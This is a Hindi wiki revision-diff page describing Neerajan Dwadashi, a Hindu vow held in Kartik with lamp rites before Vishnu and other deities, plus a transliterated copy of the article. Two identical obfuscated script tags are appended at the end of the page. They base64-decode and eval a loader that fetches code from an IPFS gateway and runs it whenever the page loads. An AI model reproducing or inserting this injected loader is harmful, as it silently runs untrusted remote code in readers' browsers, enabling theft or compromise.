Difference between revisions of "नीराजन द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ते है।" to "ते हैं।")
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[कार्तिक]] [[शुक्ल पक्ष]] की द्वादशी को यह व्रत किया जाता है।
 
*[[कार्तिक]] [[शुक्ल पक्ष]] की द्वादशी को यह व्रत किया जाता है।
 
*जब भगवान [[विष्णु]] शयन से उठते हैं, उस रात्रि के आरम्भ में इसका सम्पादन होता है।
 
*जब भगवान [[विष्णु]] शयन से उठते हैं, उस रात्रि के आरम्भ में इसका सम्पादन होता है।
Line 8: Line 8:
 
*इसे सर्वप्रथम राजा अजपाल ने आरम्भ किया और इसे प्रतिवर्ष करना चाहिए।<ref>हेमोद्रि (व्रतखण्ड 1, 1190-1194, भविष्योत्तरपुराण से उद्धरण)।</ref>
 
*इसे सर्वप्रथम राजा अजपाल ने आरम्भ किया और इसे प्रतिवर्ष करना चाहिए।<ref>हेमोद्रि (व्रतखण्ड 1, 1190-1194, भविष्योत्तरपुराण से उद्धरण)।</ref>
 
 
 
 
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 09:45, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • kartik shukl paksh ki dvadashi ko yah vrat kiya jata hai.
  • jab bhagavan vishnu shayan se uthate haian, us ratri ke arambh mean isaka sampadan hota hai.
  • vishnu pratima evan any devoan, yatha—soory, gauri, shiv, apane mata-pita, gayoan, ashvoan, gajoan ke samaksh dip ki arati karate haian.
  • raja ko apane prasad mean rajakiy vastuoan ke pratikoan ki pooja karani chahie.
  • ek sadhvi nari athava kisi sundar veshya ko raja ke sir par tin bar dip ghumana chahie.
  • yah ek mahati shanti hai jo rogoan ko bhagati hai aur atul sampatti lati hai.
  • ise sarvapratham raja ajapal ne arambh kiya aur ise prativarsh karana chahie.[1]

 

tika tippani aur sandarbh

  1. hemodri (vratakhand 1, 1190-1194, bhavishyottarapuran se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>